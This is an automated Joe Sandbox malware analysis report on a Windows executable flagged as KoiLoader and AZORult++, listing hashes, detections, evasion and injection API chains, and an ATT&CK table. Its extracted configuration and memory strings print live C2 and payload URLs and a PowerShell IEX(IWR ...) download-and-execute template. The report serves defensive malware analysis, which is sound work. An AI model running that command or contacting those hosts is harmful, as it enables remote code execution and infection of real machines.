Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DWbCUTdGhV.exe

Overview

General Information

Sample name:DWbCUTdGhV.exe
renamed because original name is a hash value
Original sample name:13b4c5dff00cf1ea8a635743903e387f.exe
Analysis ID:1528826
MD5:13b4c5dff00cf1ea8a635743903e387f
SHA1:de5d0e9a174171257a9539117d82659bbad98139
SHA256:af816c7bf551987a9d5cfd0fa2237807eba659fa271fdab041357aa9e8969e51
Tags:exeKoiLoaderuser-abuse_ch
Infos:

Detection

AZORult++, KoiLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected AZORult++ Trojan
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected KoiLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contain functionality to detect virtual machines
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Found evasive API chain (may stop execution after checking mutex)
Machine Learning detection for sample
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Program does not show much activity (idle)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • DWbCUTdGhV.exe (PID: 2132 cmdline: "C:\Users\user\Desktop\DWbCUTdGhV.exe" MD5: 13B4C5DFF00CF1EA8A635743903E387F)
  • cleanup
{"C2": "http://121.127.33.20/fermentum.php", "Payload url": "https://kionaonline.com/modules/bonslick"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_KoiLoader_1Yara detected KoiLoaderJoe Security
    00000000.00000002.2121629696.00000000013BE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_KoiLoader_1Yara detected KoiLoaderJoe Security
      Process Memory Space: DWbCUTdGhV.exe PID: 2132JoeSecurity_KoiLoader_1Yara detected KoiLoaderJoe Security
        SourceRuleDescriptionAuthorStrings
        0.2.DWbCUTdGhV.exe.13dfc40.2.unpackJoeSecurity_KoiLoader_1Yara detected KoiLoaderJoe Security
          0.2.DWbCUTdGhV.exe.11f0000.1.unpackJoeSecurity_KoiLoader_1Yara detected KoiLoaderJoe Security
            0.2.DWbCUTdGhV.exe.13dfc40.2.raw.unpackJoeSecurity_KoiLoader_1Yara detected KoiLoaderJoe Security
              No Sigma rule has matched
              No Suricata rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: DWbCUTdGhV.exeAvira: detected
              Source: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmpMalware Configuration Extractor: KoiLoader {"C2": "http://121.127.33.20/fermentum.php", "Payload url": "https://kionaonline.com/modules/bonslick"}
              Source: DWbCUTdGhV.exeReversingLabs: Detection: 71%
              Source: DWbCUTdGhV.exeVirustotal: Detection: 76%Perma Link
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: DWbCUTdGhV.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\DWbCUTdGhV.exeCode function: 0_2_011F8316 InitializeCriticalSection,GetVolumeInformationW,StringFromGUID2,wsprintfA,CreateMutexW,GetLastError,WSAStartup,CryptAcquireContextA,CryptAcquireContextA,CoInitializeEx,ExpandEnvironmentStringsW,CreateFileW,0_2_011F8316
              Source: C:\Users\user\Desktop\DWbCUTdGhV.exeCode function: 0_2_011F8340 InitializeCriticalSection,GetVolumeInformationW,StringFromGUID2,wsprintfA,CreateMutexW,GetLastError,WSAStartup,CryptAcquireContextA,CryptAcquireContextA,CoInitializeEx,ExpandEnvironmentStringsW,CreateFileW,ExitProcess,0_2_011F8340
              Source: C:\Users\user\Desktop\DWbCUTdGhV.exeCode function: 0_2_011F8F40 CryptGenRandom,HeapFree,GetProcessHeap,HeapFree,wsprintfA,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_011F8F40
              Source: DWbCUTdGhV.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: DWbCUTdGhV.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\DWbCUTdGhV.exeCode function: 0_2_00798ACD FindFirstFileExW,0_2_00798ACD
              Source: C:\Users\user\Desktop\DWbCUTdGhV.exeCode function: 0_2_011F8620 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,GlobalMemoryStatusEx,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW,0_2_011F8620

              Networking

              barindex
              Source: Malware configuration extractorURLs: http://121.127.33.20/fermentum.php
              Source: C:\Users\user\Desktop\DWbCUTdGhV.exeCode function: 0_2_011F62B0 inet_pton,inet_pton,htons,htons,inet_pton,htons,socket,socket,connect,connect,socket,connect,select,recv,send,select,closesocket,closesocket,GetProcessHeap,HeapFree,0_2_011F62B0
              Source: DWbCUTdGhV.exeString found in binary or memory: http://121.127.33.20/fermentum.php
              Source: DWbCUTdGhV.exe, 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, DWbCUTdGhV.exe, 00000000.00000002.2121629696.00000000013BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://121.127.33.20/fermentum.php%temp%
              Source: DWbCUTdGhV.exeString found in binary or memory: https://kionaonline.com/modules/bonslick
              Source: DWbCUTdGhV.exe, 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, DWbCUTdGhV.exe, 00000000.00000002.2121629696.00000000013BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kionaonline.com/modules/bonslick/c

              E-Banking Fraud

              barindex
              Source: C:\Users\user\Desktop\DWbCUTdGhV.exeCode function: 0_2_011F8DD0 EntryPoint,GetUserDefaultLangID,ExitProcess,0_2_011F8DD0
              Source: C:\Users\user\Desktop\DWbCUTdGhV.exeCode function: 0_2_011F5E70 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTempPathW,wnsprintfW,wnsprintfW,PathCombineW,CreateFileW,WriteFile,WriteFile,SetEndOfFile,SetFilePointer,wnsprintfW,RtlInitUnicodeString,RtlInitUnicodeString,RtlInitUnicodeString,GetCurrentProcess,SetFilePointer,WriteFile,FlushFileBuffers,SetEndOfFile,NtQueryInformationProcess,NtClose,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,NtClose,NtClose,NtClose,NtClose,CloseHandle,0_2_011F5E70
              Source: C:\Users\user\Desktop\DWbCUTdGhV.exeCode function: 0_2_011F5AF0 GetModuleHandleW,GetProcAddress,CreateProcessW,NtQueryInformationProcess,ReadProcessMemory,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,CloseHandle,0_2_011F5AF0
              Source: C:\Users\user\Desktop\DWbCUTdGhV.exeCode function: 0_2_0079E87D0_2_0079E87D
              Source: C:\Users\user\Desktop\DWbCUTdGhV.exeCode function: 0_2_011F74400_2_011F7440
              Source: C:\Users\user\Desktop\DWbCUTdGhV.exeCode function: 0_2_011F78600_2_011F7860
              Source: C:\Users\user\Desktop\DWbCUTdGhV.exeCode function: 0_2_011F24A00_2_011F24A0
              Source: C:\Users\user\Desktop\DWbCUTdGhV.exeCode function: 0_2_011F42600_2_011F4260
              Source: C:\Users\user\Desktop\DWbCUTdGhV.exeCode function: 0_2_011F46600_2_011F4660
              Source: C:\Users\user\Desktop\DWbCUTdGhV.exeCode function: String function: 00793040 appears 46 times
              Source: C:\Users\user\Desktop\DWbCUTdGhV.exeCode function: String function: 00794480 appears 33 times
              Source: DWbCUTdGhV.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: classification engineClassification label: mal100.bank.troj.evad.winEXE@1/0@0/0
              Source: C:\Users\user\Desktop\DWbCUTdGhV.exeCode function: 0_2_011F6210 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,0_2_011F6210
              Source: C:\Users\user\Desktop\DWbCUTdGhV.exeCode function: 0_2_011F6BC0 ExpandEnvironmentStringsW,VariantInit,CoCreateInstance,SysAllocString,SysAllocString,SysFreeString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,VariantInit,SysAllocString,SysAllocString,SysFreeString,VariantClear,0_2_011F6BC0
              Source: C:\Users\user\Desktop\DWbCUTdGhV.exeCommand line argument: jhl46745fghb0_2_00792F40
              Source: DWbCUTdGhV.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\DWbCUTdGhV.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: DWbCUTdGhV.exeReversingLabs: Detection: 71%
              Source: DWbCUTdGhV.exeVirustotal: Detection: 76%
              Source: C:\Users\user\Desktop\DWbCUTdGhV.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\DWbCUTdGhV.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\DWbCUTdGhV.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\DWbCUTdGhV.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\DWbCUTdGhV.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\DWbCUTdGhV.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\DWbCUTdGhV.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\DWbCUTdGhV.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\DWbCUTdGhV.exeSection loaded: sspicli.dllJump to behavior
              Source: DWbCUTdGhV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: DWbCUTdGhV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: DWbCUTdGhV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: DWbCUTdGhV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: DWbCUTdGhV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: DWbCUTdGhV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: DWbCUTdGhV.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: DWbCUTdGhV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: DWbCUTdGhV.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: DWbCUTdGhV.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: DWbCUTdGhV.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: DWbCUTdGhV.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: DWbCUTdGhV.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

              Data Obfuscation

              barindex
              Source: Yara matchFile source: 0.2.DWbCUTdGhV.exe.13dfc40.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.DWbCUTdGhV.exe.11f0000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.DWbCUTdGhV.exe.13dfc40.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2121629696.00000000013BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: DWbCUTdGhV.exe PID: 2132, type: MEMORYSTR
              Source: C:\Users\user\Desktop\DWbCUTdGhV.exeCode function: 0_2_00791300 GetModuleHandleA,VirtualAlloc,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualFree,VirtualProtect,0_2_00791300

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\DWbCUTdGhV.exeCode function: VMWare %systemroot%\System32\VBoxService.exe %systemroot%\System32\VBoxService.exe %systemroot%\System32\VBoxTray.exe 0_2_011F8620
              Source: C:\Users\user\Desktop\DWbCUTdGhV.exeCode function: EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,GlobalMemoryStatusEx,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW,0_2_011F8620
              Source: C:\Users\user\Desktop\DWbCUTdGhV.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_0-11755
              Source: C:\Users\user\Desktop\DWbCUTdGhV.exeFile opened / queried: C:\Windows\System32\VBoxService.exeJump to behavior
              Source: C:\Users\user\Desktop\DWbCUTdGhV.exeAPI coverage: 9.8 %
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\DWbCUTdGhV.exeCode function: 0_2_00798ACD FindFirstFileExW,0_2_00798ACD
              Source: C:\Users\user\Desktop\DWbCUTdGhV.exeCode function: 0_2_011F8620 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,GlobalMemoryStatusEx,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW,0_2_011F8620
              Source: DWbCUTdGhV.exeBinary or memory string: Hyper-V
              Source: DWbCUTdGhV.exe, 00000000.00000002.2121629696.00000000013BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: POST%s|%s|VoYGkc5RStart%d|%sINITWindowsPowerShell\v1.0\powershell.exe -enc %S%ComSpec% /c %Skernel32Wow64DisableWow64FsRedirectionWow64RevertWow64FsRedirectionShellExecuteWshell32openReleaseSeShutdownPrivilege%Shttp://121.127.33.20/fermentum.php%temp%\%paths%%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exesd2.ps1sd4.ps1https://kionaonline.com/modules/bonslick/c "powershell -command IEX(IWR -UseBasicParsing '%s/%s')"Hyper-VVMWareParallels Display AdapterRed Hat QXL controller%systemroot%\System32\VBoxService.exe%systemroot%\System32\VBoxTray.exe?
              Source: DWbCUTdGhV.exeBinary or memory string: VMWare
              Source: DWbCUTdGhV.exeBinary or memory string: %systemroot%\System32\VBoxService.exe
              Source: DWbCUTdGhV.exeBinary or memory string: %systemroot%\System32\VBoxTray.exe
              Source: C:\Users\user\Desktop\DWbCUTdGhV.exeAPI call chain: ExitProcess graph end nodegraph_0-11758
              Source: C:\Users\user\Desktop\DWbCUTdGhV.exeAPI call chain: ExitProcess graph end nodegraph_0-10419
              Source: C:\Users\user\Desktop\DWbCUTdGhV.exeCode function: 0_2_0079695B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0079695B
              Source: C:\Users\user\Desktop\DWbCUTdGhV.exeCode function: 0_2_00791300 GetModuleHandleA,VirtualAlloc,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualFree,VirtualProtect,0_2_00791300
              Source: C:\Users\user\Desktop\DWbCUTdGhV.exeCode function: 0_2_00791710 mov ecx, dword ptr fs:[00000030h]0_2_00791710
              Source: C:\Users\user\Desktop\DWbCUTdGhV.exeCode function: 0_2_007975A2 mov eax, dword ptr fs:[00000030h]0_2_007975A2
              Source: C:\Users\user\Desktop\DWbCUTdGhV.exeCode function: 0_2_00799763 mov eax, dword ptr fs:[00000030h]0_2_00799763
              Source: C:\Users\user\Desktop\DWbCUTdGhV.exeCode function: 0_2_011F7650 mov eax, dword ptr fs:[00000030h]0_2_011F7650
              Source: C:\Users\user\Desktop\DWbCUTdGhV.exeCode function: 0_2_011F5E70 mov eax, dword ptr fs:[00000030h]0_2_011F5E70
              Source: C:\Users\user\Desktop\DWbCUTdGhV.exeCode function: 0_2_0079A845 GetProcessHeap,0_2_0079A845
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\DWbCUTdGhV.exeCode function: 0_2_0079695B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0079695B
              Source: C:\Users\user\Desktop\DWbCUTdGhV.exeCode function: 0_2_00793D4E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00793D4E
              Source: C:\Users\user\Desktop\DWbCUTdGhV.exeCode function: 0_2_0079421C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0079421C
              Source: C:\Users\user\Desktop\DWbCUTdGhV.exeCode function: 0_2_007943AF SetUnhandledExceptionFilter,0_2_007943AF

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\DWbCUTdGhV.exeCode function: 0_2_011F5AF0 GetModuleHandleW,GetProcAddress,CreateProcessW,NtQueryInformationProcess,ReadProcessMemory,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,CloseHandle,0_2_011F5AF0
              Source: C:\Users\user\Desktop\DWbCUTdGhV.exeCode function: 0_2_007944C5 cpuid 0_2_007944C5
              Source: C:\Users\user\Desktop\DWbCUTdGhV.exeCode function: 0_2_00794103 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00794103
              Source: C:\Users\user\Desktop\DWbCUTdGhV.exeCode function: 0_2_011F8620 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,GlobalMemoryStatusEx,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW,0_2_011F8620
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Command and Scripting Interpreter
              1
              DLL Side-Loading
              1
              Access Token Manipulation
              11
              Virtualization/Sandbox Evasion
              OS Credential Dumping1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              2
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts11
              Native API
              Boot or Logon Initialization Scripts1
              Process Injection
              1
              Access Token Manipulation
              LSASS Memory231
              Security Software Discovery
              Remote Desktop ProtocolData from Removable Media1
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              DLL Side-Loading
              1
              Process Injection
              Security Account Manager11
              Virtualization/Sandbox Evasion
              SMB/Windows Admin SharesData from Network Shared Drive1
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Deobfuscate/Decode Files or Information
              NTDS1
              Account Discovery
              Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Obfuscated Files or Information
              LSA Secrets1
              System Owner/User Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading
              Cached Domain Credentials1
              File and Directory Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync12
              System Information Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              DWbCUTdGhV.exe71%ReversingLabsWin32.Trojan.AZORult
              DWbCUTdGhV.exe76%VirustotalBrowse
              DWbCUTdGhV.exe100%AviraTR/Kryptik.hgffj
              DWbCUTdGhV.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://kionaonline.com/modules/bonslick0%VirustotalBrowse
              http://121.127.33.20/fermentum.php%temp%0%VirustotalBrowse
              https://kionaonline.com/modules/bonslick/c0%VirustotalBrowse
              http://121.127.33.20/fermentum.php1%VirustotalBrowse
              No contacted domains info
              NameMaliciousAntivirus DetectionReputation
              http://121.127.33.20/fermentum.phptrueunknown
              NameSourceMaliciousAntivirus DetectionReputation
              https://kionaonline.com/modules/bonslickDWbCUTdGhV.exetrueunknown
              http://121.127.33.20/fermentum.php%temp%DWbCUTdGhV.exe, 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, DWbCUTdGhV.exe, 00000000.00000002.2121629696.00000000013BE000.00000004.00000020.00020000.00000000.sdmpfalseunknown
              https://kionaonline.com/modules/bonslick/cDWbCUTdGhV.exe, 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, DWbCUTdGhV.exe, 00000000.00000002.2121629696.00000000013BE000.00000004.00000020.00020000.00000000.sdmpfalseunknown
              No contacted IP infos
              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1528826
              Start date and time:2024-10-08 10:27:24 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 1m 56s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:2
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:DWbCUTdGhV.exe
              renamed because original name is a hash value
              Original Sample Name:13b4c5dff00cf1ea8a635743903e387f.exe
              Detection:MAL
              Classification:mal100.bank.troj.evad.winEXE@1/0@0/0
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 96%
              • Number of executed functions: 5
              • Number of non-executed functions: 68
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Stop behavior analysis, all processes terminated
              • Exclude process from analysis (whitelisted): dllhost.exe
              • Excluded domains from analysis (whitelisted): client.wns.windows.com, otelrules.azureedge.net
              No simulations
              No context
              No context
              No context
              No context
              No context
              No created / dropped files found
              File type:PE32 executable (GUI) Intel 80386, for MS Windows
              Entropy (8bit):5.861978800491604
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.96%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:DWbCUTdGhV.exe
              File size:182'272 bytes
              MD5:13b4c5dff00cf1ea8a635743903e387f
              SHA1:de5d0e9a174171257a9539117d82659bbad98139
              SHA256:af816c7bf551987a9d5cfd0fa2237807eba659fa271fdab041357aa9e8969e51
